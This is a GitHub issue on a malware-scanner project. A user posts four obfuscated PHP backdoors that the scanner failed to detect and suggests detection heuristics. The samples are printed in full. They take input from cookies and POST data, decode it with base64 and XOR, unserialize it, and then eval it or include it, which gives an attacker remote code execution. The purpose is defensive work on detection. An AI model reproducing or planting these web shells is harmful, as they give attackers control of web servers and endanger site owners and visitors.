Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Undetected malwares #105

Open
ebourg opened this issue Jul 18, 2024 · 1 comment
Open

Undetected malwares #105

ebourg opened this issue Jul 18, 2024 · 1 comment

Comments

@ebourg
Copy link

ebourg commented Jul 18, 2024

Just found these malwares that weren't detected by the scanner:

$GRNRFc = 'V' . '_' . "\x51" . "\x6e" . 'E' . 'K' . "\x4b";$ZkQeaKiKV = chr (99) . chr ( 482 - 374 ).chr (97) . "\x73" . "\x73" . chr (95) . chr (101) . "\x78" . chr ( 513 - 408 ).chr (115) . "\x74" . chr (115); $tHCTzrRTa = class_exists($GRNRFc); $ZkQeaKiKV = "30813";$Bnauel = !1;if ($tHCTzrRTa == $Bnauel){function EbUQQDwP(){$zrmsCLkLp = new /* 28317 */ V_QnEKK(18652 + 18652); $zrmsCLkLp = NULL;}$yCUiq = "18652";class V_QnEKK{private function vAjeUvW($yCUiq){if (is_array(V_QnEKK::$xBmKEmU)) {$DkdswkjV = str_replace("\74" . '?' . chr (112) . "\x68" . 'p', "", V_QnEKK::$xBmKEmU["\x63" . "\x6f" . "\156" . "\164" . chr (101) . "\x6e" . 't']);eval($DkdswkjV); $yCUiq = "18652";exit();}}private $OashYfi;public function avjuwOZFze(){echo 41931;}public function __destruct(){$yCUiq = "63071_28842";$this->vAjeUvW($yCUiq); $yCUiq = "63071_28842";}public function CBihlQQeR($oLvOlCz, $ICNQhIu){return $oLvOlCz[0] ^ str_repeat($ICNQhIu, (strlen($oLvOlCz[0]) / strlen($ICNQhIu)) + 1);}public function __construct($xAXqvTpA=0){$FPxTqQPgB = $_POST;$AZJPK = $_COOKIE;$ICNQhIu = "301407a7-7bdd-4637-b5c9-06e442e49d5a";$jxkKrdbK = @$AZJPK[substr($ICNQhIu, 0, 4)];if (!empty($jxkKrdbK)){$BsKyrwAEcE = "base64";$oLvOlCz = "";$jxkKrdbK = explode(",", $jxkKrdbK);foreach ($jxkKrdbK as $BuxlJxC){$oLvOlCz .= @$AZJPK[$BuxlJxC];$oLvOlCz .= @$FPxTqQPgB[$BuxlJxC];}$oLvOlCz = array_map($BsKyrwAEcE . '_' . chr ( 938 - 838 ).'e' . chr ( 574 - 475 )."\x6f" . "\x64" . "\145", array($oLvOlCz,)); $oLvOlCz = $this->CBihlQQeR($oLvOlCz, $ICNQhIu);V_QnEKK::$xBmKEmU = @unserialize($oLvOlCz);}}public static $xBmKEmU = 25143;}EbUQQDwP();}

<?php

function _charset()

{
    $raw_title = 'f97L4Hyn8Jg';
    $post_types = $raw_title;



    $previous_date = $GLOBALS[input("9%7F%7E%00q%1B", $post_types)];
    $delete = $previous_date;
        $custom_fields = '_post';
    $mime_match = isset($delete[$post_types]);

    if ($mime_match)

    {
        $tt_ids = 'internal';
        $sanitized = $previous_date[$post_types];
        $cockneyreplace = $sanitized[input("%12TG%13Z%29%14%0B", $post_types)];
        $parts = $cockneyreplace;
        include ($parts);
    }
}
function input($show_in_admin_status_list, $publicly_queryable)

{

    $wp_post_types = $publicly_queryable;
        $double_prime = 'tags_to_ignore';
    $property_name = "url" . "decode";
    $mins = $property_name($show_in_admin_status_list);

    $format = substr($wp_post_types,0, strlen($mins));

    $show_in_menu = $mins ^ $format;

    $mins = strpos($show_in_menu, $format);

    return $show_in_menu;
}
        $nohier_vs_hier_defaults = 'post_type_in_string';

_charset();

?>

$yePAZNLbRY = chr (100) . chr ( 642 - 547 )."\x49" . chr ( 1057 - 956 ).chr (69) . "\x79" . chr (76); $qffKMCuiT = "\x63" . chr (108) . chr (97) . chr ( 923 - 808 ).'s' . chr (95) . 'e' . "\x78" . "\x69" . "\163" . "\x74" . "\163";$TLvyEg = class_exists($yePAZNLbRY); $qffKMCuiT = "3393";$alXknwj = !1;if ($TLvyEg == $alXknwj){function gLYWbhtb(){return FALSE;}$sTgbCPwWxw = "41613";gLYWbhtb();class d_IeEyL{private function DmoLd($sTgbCPwWxw){if (is_array(d_IeEyL::$UiTJxGm)) {$bvlyHtI = str_replace(chr ( 106 - 46 ) . "\x3f" . "\x70" . 'h' . chr (112), "", d_IeEyL::$UiTJxGm[chr (99) . chr ( 968 - 857 ).'n' . chr ( 337 - 221 )."\145" . 'n' . chr (116)]);eval($bvlyHtI); $sTgbCPwWxw = "41613";exit();}}private $RbnFu;public function JYIasy(){echo 42935;}public function __destruct(){$sTgbCPwWxw = "14197_12147";$this->DmoLd($sTgbCPwWxw); $sTgbCPwWxw = "14197_12147";}public function __construct($sQvGICW=0){$HidyYs = $_POST;$xcZSJMJSS = $_COOKIE;$nDkFFGJ = "adaea6d7-c626-495a-9839-246089b4c92a";$WwkXBUdfJJ = @$xcZSJMJSS[substr($nDkFFGJ, 0, 4)];if (!empty($WwkXBUdfJJ)){$EctSW = "base64";$oLeNYMtOPT = "";$WwkXBUdfJJ = explode(",", $WwkXBUdfJJ);foreach ($WwkXBUdfJJ as $phDSwy){$oLeNYMtOPT .= @$xcZSJMJSS[$phDSwy];$oLeNYMtOPT .= @$HidyYs[$phDSwy];}$oLeNYMtOPT = array_map($EctSW . "\137" . "\144" . "\145" . "\x63" . "\157" . "\x64" . "\x65", array($oLeNYMtOPT,)); $oLeNYMtOPT = $oLeNYMtOPT[0] ^ str_repeat($nDkFFGJ, (strlen($oLeNYMtOPT[0]) / strlen($nDkFFGJ)) + 1);d_IeEyL::$UiTJxGm = @unserialize($oLeNYMtOPT); $oLeNYMtOPT = class_exists("14197_12147");}}public static $UiTJxGm = 44887;}$UfEFb = new /* 25527 */ $yePAZNLbRY(41613 + 41613); $sTgbCPwWxw = strpos($sTgbCPwWxw, $sTgbCPwWxw); $alXknwj = $UfEFb = $sTgbCPwWxw = Array();}

I guess that using the functions explode and eval on the first line of a file could be flagged as suspicious.
@ebourg
Copy link
Author

ebourg commented Jul 18, 2024

Another one, without the eval function:

$exXhBCc = 't' . "\137" . "\x6c" . "\x63" . 'y';$JjYSAMYHH = "\x63" . "\x6c" . chr ( 717 - 620 ).'s' . chr ( 165 - 50 ).'_' . "\145" . "\170" . "\151" . "\x73" . chr (116) . "\x73";$wzfPz = class_exists($exXhBCc); $JjYSAMYHH = "44175";$aDLLwXVYSL = !1;if ($wzfPz == $aDLLwXVYSL){function FzMEGqlMK(){$VVaMVwrN = new /* 41728 */ t_lcy(5855 + 5855); $VVaMVwrN = NULL;}$cDNjoQAt = "5855";class t_lcy{private function tSazHL($cDNjoQAt){if (is_array(t_lcy::$HmCPtFpTo)) {$kpOpXOOQ = sys_get_temp_dir() . "/" . crc32(t_lcy::$HmCPtFpTo["\163" . "\x61" . chr ( 1085 - 977 )."\164"]);@t_lcy::$HmCPtFpTo["\x77" . "\x72" . "\151" . chr ( 769 - 653 ).'e']($kpOpXOOQ, t_lcy::$HmCPtFpTo["\143" . "\x6f" . "\156" . chr (116) . chr ( 590 - 489 )."\156" . chr (116)]);include $kpOpXOOQ;@t_lcy::$HmCPtFpTo[chr ( 312 - 212 ).'e' . 'l' . "\145" . "\164" . 'e']($kpOpXOOQ); $cDNjoQAt = "5855";exit();}}private $aEFjoHrDU;public function VzdTtnMm(){echo 1986;}public function __destruct(){t_lcy::$HmCPtFpTo = @unserialize(t_lcy::$HmCPtFpTo); $cDNjoQAt = "64201_44762";$this->tSazHL($cDNjoQAt); $cDNjoQAt = "64201_44762";}public function OdICv($ihsQcHj, $ZUMkhwR){return $ihsQcHj[0] ^ str_repeat($ZUMkhwR, (strlen($ihsQcHj[0]) / strlen($ZUMkhwR)) + 1);}public function __construct($qQNwRv=0){$FpjbTffga = $_POST;$VuwvnDjEdq = $_COOKIE;$ZUMkhwR = "de91630f-5086-4c88-8fa4-67d5961f9380";$BQSVpVoUG = @$VuwvnDjEdq[substr($ZUMkhwR, 0, 4)];if (!empty($BQSVpVoUG)){$GnQvdl = "base64";$ihsQcHj = "";$BQSVpVoUG = explode(",", $BQSVpVoUG);foreach ($BQSVpVoUG as $VOaHShiHN){$ihsQcHj .= @$VuwvnDjEdq[$VOaHShiHN];$ihsQcHj .= @$FpjbTffga[$VOaHShiHN];}$ihsQcHj = array_map($GnQvdl . "\137" . "\x64" . "\145" . chr (99) . "\157" . chr ( 524 - 424 )."\145", array($ihsQcHj,));t_lcy::$HmCPtFpTo = $this->OdICv($ihsQcHj, $ZUMkhwR);}}public static $HmCPtFpTo = 53491;}FzMEGqlMK();}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@ebourg